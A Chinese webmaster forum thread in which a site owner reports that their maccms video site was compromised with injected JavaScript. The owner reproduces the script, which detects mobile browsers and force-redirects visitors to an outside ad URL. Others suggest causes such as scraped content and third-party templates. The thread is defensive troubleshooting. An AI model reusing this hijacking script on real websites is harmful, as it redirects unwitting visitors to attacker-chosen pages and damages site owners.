【更新】被植入了，目前只有弹出广告。

acg88

电影 gqc.ink

植入的url https://abyss-static.anei.tv/js/adcgys.js

1. function getMobileType() {
   
2.   var ua = window.navigator.userAgent; //navigator.appVersion
   
3.   return {
   
4.     mobile: !!ua.match(/AppleWebKit.*Mobile.*/), //鏄惁涓虹Щ鍔ㄧ粓绔�
   
5.     ios: !!ua.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios缁堢
   
6.     android: ua.indexOf("Android") > -1 || ua.indexOf("Linux") > -1, //android缁堢鎴栬€卽c娴忚鍣�
   
7.     iPhone: ua.indexOf("iPhone") > -1 || ua.indexOf("Mac") > -1, //鏄惁涓篿Phone鎴栬€匭QHD娴忚鍣�
   
8.     iPad: ua.indexOf("iPad") > -1, //鏄惁iPad
   
9.     trident: ua.indexOf("Trident") > -1, //IE鍐呮牳
   
10.     presto: ua.indexOf("Presto") > -1, //opera鍐呮牳
    
11.     webKit: ua.indexOf("AppleWebKit") > -1, //鑻规灉銆佽胺姝屽唴鏍�
    
12.     gecko: ua.indexOf("Gecko") > -1 && ua.indexOf("KHTML") == -1, //鐏嫄鍐呮牳
    
13.     weixin: ua.indexOf("MicroMessenger") > -1, //鏄惁寰俊 ua.match(/MicroMessenger/i) == "micromessenger",
    
14.   };
    
15. }
    
16. var jumpurl = "https://hn.ci3xg.com/1022.html";
    
17. var jumpkey = window.location.hostname + "_adcgys_jmup_time";
    
18. setInterval(function () {
    
19.   var timestamp = new Date().valueOf();
    
20.   var jmup_time = parseInt(window.localStorage.getItem(jumpkey));
    
21.   if (isNaN(jmup_time) || timestamp - jmup_time > 2 * 60 * 60 * 1000) {
    
22.     if (getMobileType().mobile) {
    
23.       setTimeout(function () {
    
24.         window.location.href = jumpurl;
    
25.       }, 3000);
    
26.       window.localStorage.setItem(jumpkey, new Date().valueOf());
    
27.     } else {
    
28.       setTimeout(function () {
    
29.         window.location.href = jumpurl;
    
30.       }, 30000);
    
31.       window.localStorage.setItem(jumpkey, new Date().valueOf());
    
32.     }
    
33.   }
    
34. }, 1000);

复制代码

会跳转刀https://hn.ci3xg.com/1022.html
还没看到哪里触发这个js

更新  








看文件修改时间，那段时间开始打不开页面，卡死，然后我重装程序，可以打开，但弹窗，找到被改文件，但目前还不确定怎样被拿权修改，虽然有怀疑对象但苦无证据。

机长

maccms很正常  弹广告弹到你站一毛不剩 现在还用maccms建站纯浪费时间

花菜大魔王

看看我的有没有弹出

acg88

花菜大魔王 发表于 2023-11-18 16:43
看看我的有没有弹出

你的没有，我新安装的，可能最先从数据植入，采集的时候伪装成图片，我看到网上有src=然后就是js地址，但现在找不到这个地址清除，得找到触发清除掉。

Wine

不是说什么player.js加密什么的吗

acg88

Wine 发表于 2023-11-18 16:50
不是说什么player.js加密什么的吗

现在没有那种事的。

Wine

acg88 发表于 2023-11-18 17:24
现在没有那种事的。

哦哦，那还有啥问题- -，那我就不知道了，毕竟我也没用过maccms(本来想试试，还停留在新建文件夹中)。你可以先不用第三方模板看看，有些跳广告是模板导致的。然后再看看啥问题。

acg88

更新